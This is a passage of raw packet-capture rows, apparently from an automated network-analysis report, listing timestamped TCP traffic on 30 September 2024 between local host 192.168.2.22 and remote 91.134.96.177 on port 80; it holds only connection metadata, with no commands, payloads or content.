                                                                                                                                                                                                Sep 30, 2024 16:24:27.347382069 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347409964 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347439051 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347486973 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348144054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348176956 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348192930 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348212957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348237991 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348268986 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348301888 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.348316908 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349122047 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349153996 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349169970 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349189043 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349189043 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349225998 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349235058 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349263906 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349817038 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349849939 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349867105 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349880934 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349884033 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349917889 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349921942 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.349967957 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.350616932 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.350668907 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351468086 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351519108 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351520061 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.351558924 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433937073 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433971882 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.433994055 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434005022 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434022903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434039116 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434042931 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434073925 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434077978 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434129953 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434139013 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434174061 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434185982 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434206009 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434215069 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434241056 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434248924 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434274912 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434284925 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434320927 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434458971 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434506893 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434509039 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434541941 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434551954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434583902 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434591055 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434623957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434650898 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434654951 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434662104 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434688091 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434700012 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434720993 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434731007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434755087 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434762955 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434787989 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434794903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.434834957 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435163021 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435195923 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435219049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435233116 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435244083 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435276985 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435281038 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435313940 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435323954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435345888 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435353041 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435395002 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435431004 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435465097 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435477972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435497046 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435507059 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435529947 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435535908 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435564041 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435573101 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.435606956 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436044931 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436093092 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436094046 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436137915 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436162949 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436194897 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436207056 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436228037 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436235905 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436259985 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436268091 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436294079 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436302900 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436326027 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436336994 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436361074 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436367989 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436393023 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436395884 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436428070 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436433077 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.436470032 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.479830980 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.479850054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.479861021 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.480062962 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.480062962 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521482944 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521538019 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521569967 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521603107 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521635056 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521682024 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521703959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521703959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521703959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521703959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521703959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521714926 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521739006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521748066 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521752119 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521790981 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521799088 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521831989 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521842003 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521874905 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521892071 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521948099 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521954060 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521986961 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.521995068 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522018909 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522020102 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522020102 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522062063 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522070885 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522110939 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522181034 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522212982 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522228003 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522253036 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522263050 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522295952 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522304058 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522329092 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522336960 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522361994 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522372007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522397995 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522404909 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522425890 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522434950 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522469997 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522595882 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522648096 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522649050 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522691965 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522697926 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522737026 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522737026 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522769928 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522789001 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522804022 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522814035 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522842884 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522855997 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522888899 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522900105 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522922039 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522929907 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522954941 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522962093 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522986889 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.522999048 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523020983 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523029089 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523055077 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523061037 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523088932 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523096085 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523124933 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523134947 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523164988 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523581028 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523632050 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523674011 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523705959 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523737907 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523785114 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523807049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523807049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523807049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523818016 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523824930 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523849964 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523860931 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523883104 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523889065 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523915052 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523919106 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523947954 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.523955107 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524043083 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524060965 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524075985 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524084091 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524110079 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524120092 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524142981 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524149895 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524178028 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524183989 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524220943 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524609089 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524640083 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524655104 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524673939 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524674892 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524705887 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524712086 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.524744987 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.526896000 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.526928902 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.526949883 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.526968002 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528017044 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528074026 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528076887 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528110981 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528119087 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528141975 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528148890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528177023 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528181076 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528208971 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528219938 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528243065 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528249025 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.528285027 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529175043 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529222012 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529225111 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529256105 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529258966 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529289007 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529294968 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529326916 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529330969 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.529371977 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554848909 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554898977 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554929972 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554961920 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.554994106 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.555033922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.557037115 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567725897 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567826033 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567877054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567894936 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567894936 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567910910 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567924976 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567945004 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.567953110 CEST4917180192.168.2.2291.134.96.177
